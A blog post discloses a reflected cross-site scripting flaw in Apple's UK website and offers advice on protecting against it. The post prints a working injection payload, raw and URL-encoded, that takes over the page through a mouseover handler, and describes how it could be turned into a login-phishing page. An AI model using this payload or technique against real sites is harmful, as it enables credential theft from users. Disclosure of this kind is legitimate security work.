Disclaimer: The following description is for educational purposes only. It demonstrates how a modified URL can be used to execute scripts on a website. The purpose is to make users aware of the threat and explain how they can protect themselves against phishing scams. This is not to be seen as a tutorial on how to create a phishing site. Note that Apple, as well as a lot of other companies, monitors the traffic on its website. If you try to do something illegal, you might get into serious trouble!
Here are some screenshots in case Apple fixed the bug in the meantime (and hopefully they will soon):
A week ago, a friend told me there was an exploitable security vulnerability on Apple’s website, which enabled users to tamper with the page by modifying some parameters. The bug on the global site was quickly fixed, but it’s still present on the UK site and other localized versions.
Note that this really is Apple’s UK website (apple.com/uk) and not a replica. This is possible because the artist name, album name and tumbnail URL are passed as GET parameters (this means they are appended to the URL using the following syntax: http://www.foobar.com?param1_name=value1¶m2_name=value2) which are poorly sanatized. This practice is called XSS (Cross Site Scripting).
Wow, that was fun, but can’t that be dangerous? Yes, it can!
After some testing and analysis I figured out that the artistname parameter doesn’t escape HTML tags. I tried injecting a <script> tag but it wouldn’t execute. I was able to use a <div> container with an onmouseover event-handler to work around the problem.
Note that you can’t directly append special characters to an URL, you need to URL-encode them first. In order to do so you can use one of many websites or write your own using the encodeURIcomponent JavaScript function.
I created an invisble <div> container with a higher z-index than any other element on the page (this means it is the foreground layer) of the same width as the website. When the user moves the mouse, the onmouseover event is triggered executing the JavaScript it includes. You can virtually put anything in there. Thanks to DOM you can access any element of the site by its ID using the getElementById function. As a proof of concept I replaced the content of an entire <div> container, using the innerHTML property.
This is the “value” used for the artistname parameter:
<div style=”position:absolute;z-index:31337;width:3000px;height:2000px;margin:0;padding:0;left:0;top:0;overflow:hidden;” onmouseover=”javascript:document.getElementById(‘looking’).innerHTML=’<p>There could be virtually ANYTHING here e.g. phishing site, malicious JavaScript…</p>’;”></div>
After URL-encoding it, it looks like this:
%3Cdiv%20style%3D%22position%3Aabsolute%3Bz-index%3A31337%3Bwidth%3A3000px%3Bheight%3A2000px%3Bmargin%3A0%3Bpadding%3A0%3Bleft%3A0%3Btop%3A0%3Boverflow%3Ahidden%3B%22%20onmouseover%3D%22javascript%3Adocument.getElementById(‘looking’).innerHTML%3D’%3Cp%3EThere%20could%20be%20virtually%20ANYTHING%20here%20e.g.%20phishing%20site%2C%20malicious%20JavaScript…%3C%2Fp%3E’%3B%22%3E%3C%2Fdiv%3E
This is the complete ready to use URL:
Still sounds all techie and boring? Well in practice this means that a malfeasant person could remodel the whole site, e.g. inviting the user to log in to sign up for the chance to win a Macbook Air. Since the attacker has the full control over the content of the site he can send the login information to his own server to gather iTunes login data he could use to buy music on behalf of the user. This is commonly referred to as Phishing.
What makes it dangerous is that it doesn’t only look like Apple’s website, it is Apple’s website. Although the modification is not permanent and requires the user to open the prepared link, it is likely to fool a lot of people!
How can you protect yourself? Never be careless about your user information! Instead of using the link that was sent by you, you should go to the base page (apple.com) and follow the links to navigate to the page you are looking for. This principle is pretty easy and it doesn’t only apply to Apple’s website but everyday internet situations.
As a web developer there is one important thing you need to know: NEVER trust user input! This means you need to sanatize all user inputs before using them in your scripts or putting them into your database. In PHP there are a couple of handy functions which do the job for you, such as mysql_real_escape_string and htmlentities, you just need to make sure you use them in the appropriate context.
